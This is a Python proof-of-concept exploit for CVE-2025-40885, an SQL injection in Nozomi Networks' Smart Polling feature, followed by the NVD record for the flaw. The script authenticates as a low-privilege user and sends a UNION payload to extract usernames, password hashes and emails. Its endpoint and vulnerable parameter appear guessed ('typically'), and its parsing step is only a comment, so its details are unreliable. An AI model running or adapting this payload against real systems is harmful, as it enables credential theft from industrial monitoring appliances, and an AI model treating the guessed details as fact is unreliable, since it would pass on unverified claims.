CVE-2025-40885

# CVE-2025-40885 - Nozomi Networks Smart Polling SQL Injection PoC # Author: Security Research # Description: Demonstrates SQL injection in Smart Polling functionality import requests import sys TARGET_URL = "https://target-nozomi-instance.com" USERNAME = "low_priv_user" PASSWORD = "password123" def exploit_sqli(): # Step 1: Authenticate to obtain session session = requests.Session() login_url = f"{TARGET_URL}/api/v1/auth/login" login_data = { "username": USERNAME, "password": PASSWORD } resp = session.post(login_url, json=login_data, verify=False) if resp.status_code != 200: print("[-] Authentication failed") return print("[+] Authenticated successfully") # Step 2: Exploit SQL injection in Smart Polling parameter # The vulnerable parameter is typically the polling target/filter parameter polling_url = f"{TARGET_URL}/api/v1/smart-polling/execute" # Malicious payload using UNION-based SQL injection # Extracts database version and user information sqli_payload = "1' UNION SELECT username, password_hash, email FROM users-- -" payload_data = { "polling_target": sqli_payload, "interval": 60 } resp = session.post(polling_url, json=payload_data, verify=False) if resp.status_code == 200: print("[+] SQL Injection successful!") print(f"[+] Response: {resp.text}") # Parse leaked data from response else: print(f"[-] Exploit failed with status: {resp.status_code}") if __name__ == "__main__": exploit_sqli()

{"cve": {"id": "CVE-2025-40885", "sourceIdentifier": "[email protected]", "published": "2025-10-07T13:15:34.403", "lastModified": "2025-10-09T16:38:33.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL Injection vulnerability was discovered in the Smart Polling functionality due to improper validation of an input parameter. An authenticated user with limited privileges can execute arbitrary SELECT SQL statements on the DBMS used by the web application, potentially exposing unauthorized data."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.2.0", "matchCriteriaId": "6EE8E12E-EBAC-4B34-9D31-F68195E1F5CF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.2.0", "matchCriteriaId": "81AC5154-CA70-4917-8B33-D7AD5B57C683"}]}]}], "references": [{"url": "https://security.nozominetworks.com/NN-2025:6-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}